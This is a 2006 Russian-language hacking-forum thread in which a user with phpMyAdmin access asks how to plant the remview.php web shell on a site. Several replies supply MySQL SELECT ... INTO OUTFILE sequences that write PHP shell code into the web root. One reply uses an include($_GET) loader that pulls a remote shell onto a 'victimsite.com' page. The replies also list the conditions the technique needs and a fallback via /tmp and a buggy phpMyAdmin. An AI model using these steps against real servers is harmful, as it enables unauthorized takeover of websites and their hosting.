ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Залить remview.php через phpMyAdmin
  #1  
Старый 03.02.2006, 23:32
Аватар для Grom
Grom
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499

Репутация: 0
По умолчанию Залить remview.php через phpMyAdmin

Есть доступ к phpmyadmin, как залить remview.php на сайт?
Заранее благодарен!
 
Ответить с цитированием

  #2  
Старый 04.02.2006, 03:20
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

select запись с шелом into outfile 'path_to_file/file.php'
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #3  
Старый 04.02.2006, 10:29
Аватар для Grom
Grom
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499

Репутация: 0
По умолчанию

А можно поконкретней, пожалуйста?
 
Ответить с цитированием

  #4  
Старый 04.02.2006, 13:17
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

INSERT INTO table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM table WHERE (param1 = 7777777) INTO OUTFILE /home/site/www/shell.php
Если не прав поправте.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #5  
Старый 04.02.2006, 14:14
Аватар для Grom
Grom
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499

Репутация: 0
По умолчанию

Ругается на ошибку "1064: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM"
 
Ответить с цитированием

  #6  
Старый 04.02.2006, 14:34
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

Подумай сам.... что это может быть.. запрос тебе дали...Или ты хочешь чтобы дебе Полные права дали на Этой тачке? Гы... Иногда надо думать головой...
 
Ответить с цитированием

  #7  
Старый 04.02.2006, 15:26
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

Вообще phpMyAdmin тут не причем, есть он или нет его - не имеет значения. Ну... практически =) Дело в MySQL. Но чтобы залить файл, тот же шелл, на хостинг тебе потребуется следующее:

1) Включенные MySQL файловые функции (а их почти все вырубают для безопасности)
2) Знать полный адрес от корня файловой системы до web контента
3) Иметь в вебе диру с 0770 или 0777 чмодом
4) Выучить скуль =)

2 SanyaX
значение INTO OUTFILE ковычками обособляется =)
 
Ответить с цитированием

  #8  
Старый 04.02.2006, 18:54
Аватар для Ekib
Ekib
Новичок
Регистрация: 04.02.2006
Сообщений: 1
Провел на форуме:
9129

Репутация: 1
По умолчанию

Вот так надо:
CREATE TABLE `shell` (`script` TEXT NOT NULL) COMMENT = 'table for include';
INSERT INTO `shell` ( `script` ) VALUES ('<? phpcode(); ?>');
SELECT script FROM `shell` INTO OUTFILE '/home/localhost/www/shell.php';
DROP TABLE `shell`;
Вместо <? phpcode(); ?> пишешь код шелла или <? include($_GET[‘shell’]); ?> а потом переходишь на http://victimsite.com/shell.php?shel...ru/remview.php
Никаких кавычек в INTO OUTFILE не надо. Только права должны быть рутовые...

Последний раз редактировалось Ekib; 04.02.2006 в 18:56..
 
Ответить с цитированием

  #9  
Старый 05.02.2006, 00:19
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

если нет возможности в веб дирриктории создать файлик то можно поробовать в тмп и если phpmyadmin бажная(кажись это 2.6.*, или ещё какие, точно не помню) то проинклудить локально с её помощью, вотъ

P.S.
а файлик так создаем :
select '<? phpinfo(); ?>' from test into outfile '/tmp/ddd'

Последний раз редактировалось ShAnKaR; 05.02.2006 в 00:24..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Залить файл через шелл insidex АнтиАдмин 9 24.12.2005 02:05
залить шелл через ipb 2.0.4 alakazam Форумы 4 16.11.2005 22:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ